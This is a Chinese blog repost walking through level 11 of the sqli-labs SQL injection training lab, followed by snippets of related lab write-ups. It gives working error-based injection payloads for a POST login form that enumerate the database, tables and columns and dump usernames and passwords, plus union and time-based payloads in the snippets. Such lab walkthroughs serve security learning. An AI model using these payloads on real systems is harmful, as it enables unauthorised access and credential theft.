SQLI DUMB SERIES-11

最新推荐文章于 2024-06-09 21:40:11 发布
最新推荐文章于 2024-06-09 21:40:11 发布
阅读量281 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/momoli/p/10682524.html
版权

(1)检测构造方式

 

由此看出输入的用户名以及密码都被一对单引号所包含。

方法一:

(2) 模拟真实环境,以用户的身份登录。

(3)用burp抓包。开启抓包,输入用户名和密码,会自动跳到这个页面,右键,点击send to repeater.

(4)打开burp的repeater页面,修改post参数,测试是否存在报错注入。

说明存在报错型注入。

(5)可用extractvalue(目标xml文档,搜索路径)进行攻击。

爆库名(库名前用‘~’进行区别)

uname=admin' and extractvalue(1,concat(0x7e,(select database()))) --+&passwd=admin&submit=Submit

爆表名

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --+&passwd=admin&submit=Submit

 

爆user表的列名

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --+&passwd=admin&submit=Submit

爆值

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users)))--+&passwd=admin&submit=Submit

其他用户值

uname=admin' and extractvalue(1,concat(0x7e,(select group_concat(username,0x3a,password) from users where username not in ('Dumb','I-kill-you'))))--+&passwd=admin&submit=Submit

 

(6)测试最后得到的值是否正确

方法二:

  从(1)中看出可用闭合单引号,若通过其他途径知道了数据库里的一些用户名,即可获得密码。

转载于:https://www.cnblogs.com/momoli/p/10682524.html

weixin_34324081
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLI DUMB SERIES-1
weixin_33738578的博客
03-01 2994
less-1 (1) 可以看到提示输入ID,而且less-1题目也有提到GET,因此试试以下操作: http://127.0.0.1/sqli-labs-master/Less-1/?id=1 结果: http://127.0.0.1/sqli-labs-master/Less-1/?id=1%27 结果:   现在可知,“ ' ”并没有被过滤,因此...
SQLI DUMB SERIES-1-2
qq_43613144的博客
07-20 2378
安装了SQLI DUMB的题库 这些都是为了了解sql注入的方式,碰到的题目就是这样的题去找flag。现在就是去探索方法 第一题 1.提示输入ID,提示也有get,所以试试?id=1 再试试后面加’ 然后发现 ’ 没有被过滤,然后可以进行 回显成功 回显失败、 所以说此处存在注入点 2.用order by判断列数 第三栏位存在,第四栏位不存在,所以说这个表只有三列 3.爆库 联合查询注...
SQLI DUMB SERIES-5
weixin_34179762的博客
03-12 615
less5 (1)输入单引号,回显错误,说明存在注入点。输入的Id被一对单引号所包围,可以闭合单引号 (2)输入正常时:?id=1 说明没有显示位,因此不能使用联合查询了;可以使用报错注入,有两种方式 (3)双注入查询 参考资料:http://www.2cto.com/article/201303/192718.html 简单的说,使用聚合函数进行双注入查询时...
SQLI DUMB SERIES-2
weixin_34290096的博客
03-01 626
less2 同Less1相同,存在注入点 输入 ?id=1' 说明我们输入的数据被原封不动的带入了,无需要在1后面加单引号 (1)爆字段 ?id=1 order by 4 字段为3. (2)用union联合查询 ?id=-1 union select 1,version(),database() ...
sqli-labs 靶场 less-11~14 第十一关、第十二关、第十三关、第十四关详解:联合注入、错误注入
最新发布
Superstacks超全栈
06-09 664
同时输入正确的用户名就可以查看到数据,那么我们就只可以在这个uname位置直接注入。如果是这样的话,那就只能通过错误信息来获取数据了,如下所示。但这样还不能获取数据,则判断这个注入方式为错误注入。然后经测试采用双引号加注释符就可以验证登录成功。正常输入结果显示成功,不过没有任何提示内容。同样通过这一个点获取数据库名和用户名。通过输入判断出查询字符串的闭合方式为。获取数前数据库的数据名和用户名。获取当前数据库所有的表名。获取user表所有的列名。获取当前数据库所有的表名。获取user表所有的列名。
SQLI DUMB SERIES-11 及 Burp Suite Professional的简易使用方法
imomoe的博客
09-24 426
11关为POST提交 则我们可以借助工具:BurpLoader 将浏览器设置代理为127.0.0.1 在Burploader中设置代理 在其中添加 127.0.0.1:8080 并在前方的Running复选框打上勾 在工具中打开拦截 此时我们在浏览器中的任何数据都会被拦截 在数据报中右键选择Send to Repeater 我们再进入Repeater选项卡然后...
SQLI DUMB SERIES-16
weixin_33754913的博客
04-14 133
(1)无论怎么输入,都没有回显,但当输入 admin")#时,显示登录成功。若通过其他方法获取数据库的用户名,可通过这个方法登录成功。 (2)获取其他信息可用考虑时间延迟注入。方法同15。 转载于:https://www.cnblogs.com/momoli/p/10705374.html...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
SQLi-DB Reborn
08-27
SQLi-DB Reborn.
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入(SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
sqli-labs-master靶场
07-14
sqli-labs-master靶场是一个专门设计用于学习和测试SQL注入技术的平台。这个靶场包含了多个级别,每个级别代表一种特定的SQL注入漏洞类型,帮助用户从基础到高级逐步掌握SQL注入的防范与解决方法。 在SQL注入攻击中...
SQLI DUMB SERIES-13
weixin_33953384的博客
04-14 212
(1)检测闭合方式 通过 ') 闭合。 (2)尝试输入 admin')# 无回显。尝试报错注入, 爆表payload: admin') and extractvalue(1,concat(0x7e,(select database()))) and (' 爆表名 爆users表的列 其他均与12关相同。 转载于:https://www.cnblogs.c...
SQLI DUMB SERIES-10
imomoe的博客
09-24 430
第十关的步骤与第九关相同 可以查看之前的第九关打法 SQLI DUMB SERIES-9 //猜库名 ?id=1' and if(ascii(substr(database(),1,1))=115,sleep(2),0)--+ //猜表名 ?id=1' and if ((ascii(substr((select column_name from information_schema....
SQLI DUMB SERIES-6
weixin_34273479的博客
03-12 245
less6 输入 ?id=1" 说明双引号未被过滤,输入的id被一对双引号所包围,存在注入点,可以闭合双引号。 而输入正常时 情况和less5相同,因此注入同less5。 转载于:https://www.cnblogs.com/momoli/p/10515723.html...
SQLI DUMB SERIES-4
weixin_33725807的博客
03-02 170
less4 输入单引号发现回显正常,说明单引号被过滤了,输入双引号: ?id=1" 说明输入的Id被一对双引号和圆括号包围,因此闭合双引号和圆括号就行,其他方法跟less1差不多 例如:union查询表名 ?id=-1")union select 1,group_concat(table_name),3 from information_schema.tables%2...
sqli dumb series-1
03-16
sqli dumb series-1是一个SQL注入漏洞测试平台,用于测试网站是否存在SQL注入漏洞。它提供了一系列的测试用例,用户可以通过输入不同的参数来测试网站是否存在SQL注入漏洞。这个平台可以帮助网站管理员及时发现并...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值